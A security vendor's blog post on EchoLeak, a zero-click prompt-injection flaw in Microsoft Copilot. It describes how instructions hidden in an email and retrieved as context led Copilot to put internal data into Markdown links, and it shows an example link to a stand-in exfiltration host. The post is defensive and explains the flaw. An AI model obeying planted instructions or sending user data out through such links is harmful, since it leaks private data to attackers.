Microsoft Copilot Hacked Itself: The Truth Behind EchoLeak ZeroClick Prompt Injection

Microsoft Copilot Hacked Itself: The Truth Behind EchoLeak ZeroClick Prompt Injection

June 12, 2025

A critical zero-click vulnerability, dubbed EchoLeak (CVE-2025-32711), exposed a disturbing reality in 2025.

EchoLeak demonstrated how advanced Large Language Models (LLMs), when combined with retrieval-augmented generation (RAG), could be manipulated to leak sensitive internal data through a novel form of AI command injection.

Cytela, as a frontline MSSP in the Philippines, views EchoLeak as a pivotal moment in AI security—a sophisticated attack that exploited trust boundaries between user content and external inputs, without requiring a single click or action from the victim.

AI Meets Espionage: The Anatomy of EchoLeak
At its core, EchoLeak wasn’t a traditional software vulnerability like a buffer overflow or SQL injection. It was a logic flaw in how Microsoft Copilot interpreted context across multiple data sources. The flaw allowed external content, such as an attacker’s email, to inject hidden commands into Copilot’s internal prompt processing pipeline.

Using RAG, Microsoft Copilot pulls relevant user data (emails, files, chats) to enhance responses. EchoLeak exploited this mechanism by planting malicious instructions in an email, which were later unknowingly executed by Copilot when the user performed a legitimate query. This prompt injection bypassed security filters, triggering Copilot to extract sensitive data and embed it in its responses—often hidden in obfuscated Markdown links.

Zero-Click Execution Workflow
The EchoLeak exploit chain unfolded as follows:

The Bait: A well-crafted email containing concealed AI instructions lands in the victim’s inbox.

The Trigger: The user later queries Copilot to summarize project updates or recent conversations.

The Snare: Copilot’s RAG mechanism automatically includes the attacker’s email as “relevant context.”

The Heist: Malicious instructions activate within the prompt, causing Copilot to fetch and format internal data for exfiltration.

The Exfiltration: Data is disguised inside Markdown reference-style links ([text]: http://malicious.site/?data=<payload>), bypassing output filtering and triggering automatic outbound requests.

The Disguise: Malicious URLs impersonated trusted Microsoft domains (e.g., SharePoint or Teams), bypassing CSPs and redirection filters.

The attack succeeded without any user interaction, relying entirely on Copilot’s default behavior and trust mechanisms—making this a textbook zero-click AI vulnerability.

Discovery and Containment Timeline
EchoLeak was rapidly contained through responsible disclosure and coordinated remediation:

January 2025: Discovered by Aim Labs during adversarial AI testing.

May 2025: Microsoft issued a cloud-side fix, resolving the flaw across M365 Copilot without user intervention.

June 2025: Public disclosure and coordinated advisories released by Microsoft.

Impact Assessment: Microsoft confirmed no evidence of active exploitation in the wild, though the potential implications remain severe.

Microsoft’s Remediation Approach
Microsoft took a multi-pronged approach to neutralize EchoLeak:

  • Enhanced Prompt Filters: Improved detection of prompt injections and obfuscated instructions.
  • Output Validation: Patched Markdown link rendering and suppressed unsafe content injection paths.
  • RAG Adjustments: Isolated and sanitized external content before inclusion in AI context.
  • Policy Hardening: Tightened CSP rules to restrict unauthorized outbound calls.
  • Defense-in-Depth: Introduced additional AI-specific controls across the Copilot stack.

Key Lessons from EchoLeak
EchoLeak illustrates the future of cyber threats—where vulnerabilities don’t just live in code, but in logic, context, and the behavior of autonomous AI agents.

1. AI Expands the Attack Surface: Copilot had elevated access to user data, turning it into a privileged actor with minimal oversight.

2. Trust Boundaries Must Be Enforced: Untrusted external content (like email) must be tightly segregated from internal AI processing.

3. AI-Specific Threat Models Are Required: Traditional detection systems failed to identify the threat. Prompt injection and context manipulation require new defense paradigms.

4. Output Control is as Critical as Input Control: Attackers exploited output formatting (Markdown) to sneak past link sanitizers.

5. Zero-Click Risks Are Real: AI’s automated actions can trigger high-impact breaches without user engagement.

Cytela’s Recommendations to Defend Against AI Vulnerabilities
Organizations leveraging AI tools must urgently adapt their security posture. Cytela recommends the following safeguards:

  • Granular Input Trust Controls: Apply strict isolation between internal and external sources in AI contexts.
  • Hardened Prompt Injection Filters: Regularly update filters and heuristics for adversarial input patterns.
  • Output Post-Processing Pipelines: Sanitize all AI-generated responses before rendering, especially those containing links or embedded media.
  • Minimum Necessary Access for AI Agents: Enforce least-privilege principles on data scopes accessible to LLMs.
  • Dedicated AI Red Teaming: Regularly simulate attacks like EchoLeak during development and production.
  • Security Telemetry & Monitoring: Track AI usage patterns for anomalies and suspicious behavior.
  • User Education & Access Transparency: Allow users to inspect what data AI tools can access and provide opt-out mechanisms.

Final Thoughts
EchoLeak is a watershed moment in cybersecurity—proof that even the most trusted AI tools can be compromised in ways unimaginable a few years ago. As AI continues to permeate enterprise environments, threat actors are evolving to exploit not just software flaws, but logical and behavioral vulnerabilities unique to LLM-powered systems.

Cytela urges organizations to approach AI not just as an innovation asset, but as a new class of digital infrastructure—one that demands the same rigor, oversight, and layered defense as any mission-critical system.

comments powered by Disqus
call to action

Book A Meeting

We provide trial and consultation of our specialized services designed to address your organisations’ security challenges.